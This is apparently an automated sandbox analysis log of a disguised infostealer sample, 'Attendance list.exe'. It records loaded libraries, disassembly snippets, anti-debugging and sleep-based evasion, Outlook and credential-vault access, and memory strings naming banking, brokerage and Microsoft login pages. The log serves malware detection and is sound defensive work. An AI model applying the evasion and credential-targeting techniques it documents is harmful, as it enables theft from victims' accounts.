            Source: C:\Users\user\Desktop\Attendance list.exe, Section loaded: version.dll
            Source: C:\Users\user\Desktop\Attendance list.exe, Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\Attendance list.exe, Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\Attendance list.exe, Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Attendance list.exe, Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Attendance list.exe, Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Attendance list.exe, Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Attendance list.exe, Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Attendance list.exe, Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Attendance list.exe, Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Attendance list.exe, Section loaded: ntmarta.dll
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe, Section loaded: wininet.dll
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe, Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe, Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe, Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe, Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe, Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\clip.exe, Section loaded: version.dll
            Source: C:\Windows\SysWOW64\clip.exe, Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\clip.exe, Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\clip.exe, Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\clip.exe, Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\clip.exe, Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\clip.exe, Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\clip.exe, Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\clip.exe, Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\clip.exe, Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\clip.exe, Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\clip.exe, Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\clip.exe, Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Attendance list.exeStatic file information: File size 1193472 > 1048576
            Source: Attendance list.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Attendance list.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Attendance list.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Attendance list.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Attendance list.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Attendance list.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000000.2093430557.000000000012E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Attendance list.exe, 00000000.00000003.1995113050.0000000003620000.00000004.00001000.00020000.00000000.sdmp, Attendance list.exe, 00000000.00000003.1993378375.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2081581870.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180709353.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080172429.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180709353.000000000379E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2183326669.0000000004463000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2180679254.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4463310775.00000000047AE000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4463310775.0000000004610000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Attendance list.exe, 00000000.00000003.1995113050.0000000003620000.00000004.00001000.00020000.00000000.sdmp, Attendance list.exe, 00000000.00000003.1993378375.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2081581870.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180709353.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080172429.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180709353.000000000379E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000004.00000003.2183326669.0000000004463000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2180679254.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4463310775.00000000047AE000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4463310775.0000000004610000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000002.00000003.2139386634.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180501051.0000000003000000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000005BDC000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4461785541.0000000002766000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2467474395.000000001DB2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000005BDC000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4461785541.0000000002766000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2467474395.000000001DB2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000002.00000003.2139386634.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180501051.0000000003000000.00000004.00000020.00020000.00000000.sdmp
            Source: Attendance list.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Attendance list.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Attendance list.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Attendance list.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Attendance list.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0093C304 LoadLibraryA,GetProcAddress,0_2_0093C304
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008E8B85 push ecx; ret 0_2_008E8B98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004031C0 push eax; ret 2_2_004031C2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004161D3 push ecx; ret 2_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004162CC push ecx; ret 2_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417356 push ebx; retf 2_2_00417359
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416338 push ecx; ret 2_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004083DA push es; ret 2_2_004083DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040BBEC pushad ; iretd 2_2_0040BBEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418577 push 2823B84Bh; retf 2_2_00418587
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417D38 push ecx; iretd 2_2_00417D39
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401E6C push dword ptr [ebx+3E93C2B8h]; retf 2_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411E39 push esp; ret 2_2_00411E41
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401ECE push dword ptr [ebx+3E93C2B8h]; retf 2_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360225F pushad ; ret 2_2_036027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036027FA pushad ; ret 2_2_036027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD push ecx; mov dword ptr [esp], ecx2_2_036309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360283D push eax; iretd 2_2_03602858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360135F push eax; iretd 2_2_03601369
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046127FA pushad ; ret 4_2_046127F9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0461225F pushad ; ret 4_2_046127F9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0461283D push eax; iretd 4_2_04612858
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046409AD push ecx; mov dword ptr [esp], ecx4_2_046409B6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_026603DB push ecx; retf 4_2_026603DC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_02654193 push ebx; retf 4_2_02654196
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_02648A29 pushad ; iretd 4_2_02648A2B
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_02654B75 push ecx; iretd 4_2_02654B76
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_02656F40 push edx; retf 4_2_02656F9A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0264EC76 push esp; ret 4_2_0264EC7E
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0265ACE1 push edi; ret 4_2_0265ACE2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0265AD62 push FFFFFFB8h; retf 4_2_0265AD64
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_02645217 push es; ret 4_2_0264521B
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008C4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008C4A35
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_009455FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_009455FD
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008E33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008E33C7
            Source: C:\Users\user\Desktop\Attendance list.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Attendance list.exeAPI/Special instruction interceptor: Address: E83204
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E rdtsc 2_2_0367096E
            Source: C:\Windows\SysWOW64\clip.exe Window / User API: threadDelayed 9836
            Source: C:\Users\user\Desktop\Attendance list.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-100928
            Source: C:\Users\user\Desktop\Attendance list.exeAPI coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\clip.exeAPI coverage: 2.6 %
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe TID: 2920 Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe TID: 2920 Thread sleep count: 31 > 30
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe TID: 2920 Thread sleep time: -46500s >= -30000s
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe TID: 2920 Thread sleep count: 39 > 30
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe TID: 2920 Thread sleep time: -39000s >= -30000s
            Source: C:\Windows\SysWOW64\clip.exe TID: 5624 Thread sleep count: 136 > 30
            Source: C:\Windows\SysWOW64\clip.exe TID: 5624 Thread sleep time: -272000s >= -30000s
            Source: C:\Windows\SysWOW64\clip.exe TID: 5624 Thread sleep count: 9836 > 30
            Source: C:\Windows\SysWOW64\clip.exe TID: 5624 Thread sleep time: -19672000s >= -30000s
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00924696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00924696
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0092C9C7
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092C93C FindFirstFileW,FindClose,0_2_0092C93C
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0092F200
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0092F35D
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0092F65E
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00923A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00923A2B
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00923D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00923D4E
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0092BF27
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0265BC20 FindFirstFileW,FindNextFileW,FindClose,4_2_0265BC20
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008C4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008C4AFE
            Source: 23802I71.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 23802I71.4.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 23802I71.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 23802I71.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 23802I71.4.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 23802I71.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 23802I71.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 23802I71.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 23802I71.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: 23802I71.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 23802I71.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 23802I71.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 23802I71.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 23802I71.4.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 23802I71.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4462401508.0000000000E4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 23802I71.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 23802I71.4.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: 23802I71.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 23802I71.4.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: firefox.exe, 00000006.00000002.2468962186.000002391DAAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
            Source: 23802I71.4.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 23802I71.4.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 23802I71.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 23802I71.4.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 23802I71.4.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 23802I71.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: clip.exe, 00000004.00000002.4461785541.0000000002766000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
            Source: 23802I71.4.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 23802I71.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: 23802I71.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 23802I71.4.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 23802I71.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 23802I71.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\Attendance list.exeAPI call chain: ExitProcess graph end nodegraph_0-99182
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\clip.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E rdtsc 2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004173E3 LdrLoadDll,2_2_004173E3
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_009341FD BlockInput,0_2_009341FD
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008C3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008C3B4C
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008F5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_008F5CCC
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0093C304 LoadLibraryA,GetProcAddress,0_2_0093C304
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00E834D0 mov eax, dword ptr fs:[00000030h]0_2_00E834D0
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00E83470 mov eax, dword ptr fs:[00000030h]0_2_00E83470
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00E81E70 mov eax, dword ptr fs:[00000030h]0_2_00E81E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D437C mov eax, dword ptr fs:[00000030h]2_2_036D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov ecx, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA352 mov eax, dword ptr fs:[00000030h]2_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D8350 mov ecx, dword ptr fs:[00000030h]2_2_036D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370634F mov eax, dword ptr fs:[00000030h]2_2_0370634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov ecx, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C310 mov ecx, dword ptr fs:[00000030h]2_2_0362C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650310 mov ecx, dword ptr fs:[00000030h]2_2_03650310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036663FF mov eax, dword ptr fs:[00000030h]2_2_036663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC3CD mov eax, dword ptr fs:[00000030h]2_2_036EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B63C0 mov eax, dword ptr fs:[00000030h]2_2_036B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov ecx, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
